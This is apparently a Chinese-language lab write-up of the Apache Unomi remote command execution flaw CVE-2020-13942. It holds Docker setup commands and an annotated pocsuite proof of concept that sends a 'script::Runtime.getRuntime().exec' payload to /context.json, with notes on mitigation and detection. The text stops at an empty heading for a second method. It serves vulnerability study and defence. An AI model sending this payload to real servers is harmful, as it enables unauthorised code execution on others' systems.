Apache Unomi 命令执行漏洞（CVE-2020-13942）

环境搭建

# Lab setup: a private Docker network with Elasticsearch as Unomi's backing store.
docker network create unomi
# Elasticsearch 7.4.2 in single-node mode; cluster.name must match what Unomi expects (contextElasticSearch).
# NOTE: -p publishes 9200/9300 on every host interface and ES runs without auth here; keep this lab off shared networks.
docker run --name elasticsearch --net unomi -p 9200:9200 -p 9300:9300 -e "discovery.type=single-node" -e cluster.name=contextElasticSearch docker.elastic.co/elasticsearch/elasticsearch:7.4.2
# Unomi 1.5.0-SNAPSHOT (the vulnerable build) pointed at the ES container by service name.
# 8181 is the HTTP port the PoC below talks to; 9443/8102 are also published on the host.
docker run --name unomi --net unomi -p 8181:8181 -p 9443:9443 -p 8102:8102 -e UNOMI_ELASTICSEARCH_ADDRESSES=elasticsearch:9200 apache/unomi:1.5.0-SNAPSHOT

漏洞利用

#!/usr/bin/env python
# coding: utf-8
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
import requests
import urllib
# Silences urllib3's InsecureRequestWarning; note the POST in _verify does not pass verify=False,
# so this only matters if the target is HTTPS and verification is disabled elsewhere.
requests.packages.urllib3.disable_warnings()
class TestPOC(POCBase):
    """pocsuite PoC for CVE-2020-13942 (Apache Unomi).

    Sends one POST to ``/context.json`` whose condition ``parameterValues``
    carries a ``script::`` expression; in affected releases that value is
    handed to the server-side expression evaluator instead of being treated
    as data. Most metadata fields below are left blank by the author.

    Defender notes:
    - Mitigation: upgrade Unomi to a release that fixes CVE-2020-13942 and do
      not expose the context endpoint to untrusted networks.
    - Detection: request bodies to ``/context.json`` containing ``script::``
      inside ``parameterValues`` are a reliable indicator of this probe.
    """
    vulID = ''  # ssvid
    version = ''
    author = ['co0ontty']
    vulDate = ''
    createDate = ''
    updateDate = ''
    references = ['']
    name = 'CVE-2020-13942'
    appPowerLink = ''
    appName = ''
    appVersion = ''
    vulType = ''
    desc = '''
    '''
    samples = ['']
    install_requires = ['']

    def _verify(self) -> Output:
        """Probe ``self.url`` and return a pocsuite Output.

        Returns:
            Output marked success when the response looks like a normal
            context.json reply (status 200 and the four expected keys),
            otherwise failure.
        """
        vul_url = self.url
        cmd = "id"  # unused: the payload below hard-codes its own command
        result: dict[str, dict[str, str]] = {}
        # The "script::" prefix is what reaches the expression evaluator on
        # vulnerable builds. The payload's side effect (a file under /tmp on
        # the target) is never checked by this PoC.
        body = '''{"filters":[{"id":"filter1","filters":[{"condition":{"parameterValues": {"": "script::Runtime.getRuntime().exec('touch /tmp/66');"},"type":"profilePropertyCondition"}}]}],"sessionId":"demo-session-id"}'''
        # No timeout is set, so an unresponsive target blocks the scan;
        # no explicit Content-Type is sent either (body is passed as raw data).
        resp = requests.post("{}/context.json".format(vul_url),data = body)
        # Only checks that the endpoint answered with its usual response shape;
        # a 200 with these keys shows the endpoint is reachable, not that the
        # expression was executed (a patched server may answer the same way).
        if resp.status_code == 200 and all(_ in resp.text for _ in ['profileId','profileProperties','filteringResults','trackedConditions']):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        pass  # no-op left by the author
        return self.parse_output(result)

    # attack mode reuses the same single request; there is no separate exploit path
    _attack = _verify

    def parse_output(self, result: dict) -> Output:
        """Wrap ``result`` in a pocsuite Output.

        Args:
            result: dict built by ``_verify``; empty means the check failed.

        Returns:
            Output with ``success(result)`` when ``result`` is non-empty,
            otherwise ``fail('Internet nothing returned')``.
        """
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

   

# Registers the PoC class with the pocsuite framework at import time.
register(TestPOC)

漏洞作者还给了一种利用方式:

利用方式-2